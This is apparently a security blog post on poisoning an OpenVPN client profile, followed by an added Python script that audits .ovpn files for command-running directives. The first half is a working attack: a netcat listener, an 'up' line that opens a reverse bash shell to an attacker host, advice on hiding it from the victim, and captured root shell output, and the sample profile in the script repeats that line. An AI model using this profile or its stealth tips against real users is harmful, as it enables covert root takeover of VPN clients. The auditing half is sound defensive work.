
Poisoned OpenVPN

 ·  🎃 kr0m

This time we will see how to get a shell on a remote machine that acts as a VPN client, using OpenVPN's ability to run a command right after the tunnel comes up. The victim, of course, has to import a configuration file we control (or have their existing one tampered with). The nice part of this attack is that, from the victim's point of view, the VPN comes up as usual while the reverse connection is established quietly in the background.

We start netcat listening for the reverse connection:

KettleBell ✺ ~> nc -l -p 7777

We edit the client profile so that OpenVPN runs our command as soon as the tunnel is up. The script-security 2 line is required: the default level (1) only lets OpenVPN call its built-in helpers such as ifconfig or route, not user-defined commands:

vi client.ovpn

script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"

A few details worth knowing about how OpenVPN handles this directive. It runs the up command with its start-up privileges, before any user/group downgrade takes effect, which is why the shell below comes back as root even on clients that drop privileges. It splits the quoted string into argv itself (no shell is involved) and appends the interface parameters (tun_dev tun_mtu link_mtu ifconfig_local_ip ifconfig_remote_ip init) to the command line, so whatever up points at must tolerate those extra arguments; if a particular netcat build complains about them, wrapping the call in a small script avoids the problem. It also waits for the up command to exit before continuing with the rest of the tunnel initialisation, so a netcat that stays connected for a long time holds the client up; backgrounding it from a wrapper script keeps things looking normal on the victim's side.

The victim starts the VPN with the poisoned profile:

DirtyCow ~ # openvpn --config client.ovpn

In the netcat terminal, we get a nice shell:

KettleBell ✺ ~> nc -l -p 7777
id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
uname -a
Linux DirtyCow 4.9.95-gentoo-kr0m-ipv6-YAMA #1 SMP PREEMPT Wed Apr 25 10:22:48 CEST 2018 x86_64 Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz GenuineIntel GNU/Linux
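The defensive side of the same trick: before importing a .ovpn file someone hands you, look for the directives that make OpenVPN execute commands. The checker below is an added example, not code from the original post or from the OpenVPN project. The directive names and the argument order OpenVPN appends to up are taken from the OpenVPN 2.x manual; the interface values in openvpn_up_argv and the two sample profiles at the bottom are constructed for this example, with SAMPLE_POISONED mirroring the client.ovpn shown above.

```python
#!/usr/bin/env python3
"""Audit an OpenVPN client profile for directives that run external commands.

Added example, not code from the original post. Directive names and the
arguments OpenVPN appends to `up` follow the OpenVPN 2.x manual; the sample
profiles at the bottom are constructed, SAMPLE_POISONED mirroring this page.
"""
import re
import shlex
import sys

# Directives whose arguments OpenVPN hands to execve() when script-security >= 2.
# `up` is the one used on this page; the others fire on other tunnel events.
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin",
}


def parse_directives(text):
    """Yield (lineno, argv) for every directive line in an OpenVPN config.

    Lines starting with '#' or ';' are comments. Inline blocks such as
    <ca> ... </ca> carry PEM material, not directives, so they are skipped.
    Arguments may be quoted with "..." or '...', which shlex handles.
    """
    inline_block = None
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if inline_block is not None:
            if line == f"</{inline_block}>":
                inline_block = None
            continue
        if not line or line[0] in "#;":
            continue
        opening = re.fullmatch(r"<([A-Za-z0-9_-]+)>", line)
        if opening:
            inline_block = opening.group(1)
            continue
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = line.split()
        if argv:
            yield lineno, argv


def audit_profile(text):
    """Summarise command-execution risk: script-security level and findings."""
    level = 1  # OpenVPN's default: built-in executables only, no user scripts
    findings = []
    for lineno, argv in parse_directives(text):
        key = argv[0].lower()
        if key == "script-security" and len(argv) > 1 and argv[1].isdigit():
            level = int(argv[1])
        elif key in SCRIPT_DIRECTIVES:
            findings.append({"line": lineno, "directive": key,
                             "command": " ".join(argv[1:])})
    return {
        "script_security": level,
        "user_scripts_enabled": level >= 2,
        "findings": findings,
        # A script directive is only live when user scripts are enabled.
        "executes_commands": level >= 2 and bool(findings),
    }


def openvpn_up_argv(command, tun_dev="tun0", tun_mtu=1500, link_mtu=1541,
                    local_ip="10.8.0.2", remote_ip="10.8.0.1", state="init"):
    """Reconstruct the argv OpenVPN builds for an `up` command.

    OpenVPN splits the quoted command into words (no shell) and appends
    tun_dev tun_mtu link_mtu ifconfig_local_ip ifconfig_remote_ip [init|restart].
    The interface values used here are illustrative assumptions.
    """
    return shlex.split(command) + [tun_dev, str(tun_mtu), str(link_mtu),
                                   local_ip, remote_ip, state]


# Constructed sample: the poisoned profile from this page plus a dummy <ca>
# block whose contents must not be mistaken for directives.
SAMPLE_POISONED = """\
client
dev tun
remote vpn.example.invalid 1194
# harmless-looking comment
script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"
<ca>
-----BEGIN CERTIFICATE-----
up notadirective
-----END CERTIFICATE-----
</ca>
"""

# Constructed sample: the same profile with the two poisoned lines removed.
SAMPLE_CLEAN = SAMPLE_POISONED.replace(
    'script-security 2\nup "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"\n', "")


def main(path=None):
    text = open(path).read() if path else SAMPLE_POISONED
    report = audit_profile(text)
    for f in report["findings"]:
        print(f"line {f['line']}: {f['directive']} -> {f['command']}")
        print("  argv as OpenVPN would execute it:", openvpn_up_argv(f["command"]))
    print("script-security:", report["script_security"],
          "| executes commands:", report["executes_commands"])
    return report


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with a profile path to audit a real file, or with no arguments to see the report for the constructed sample. The reconstructed argv makes the extra-argument caveat visible: the netcat binary receives the interface parameters after -e /bin/bash, which is the part a wrapper script normally has to absorb.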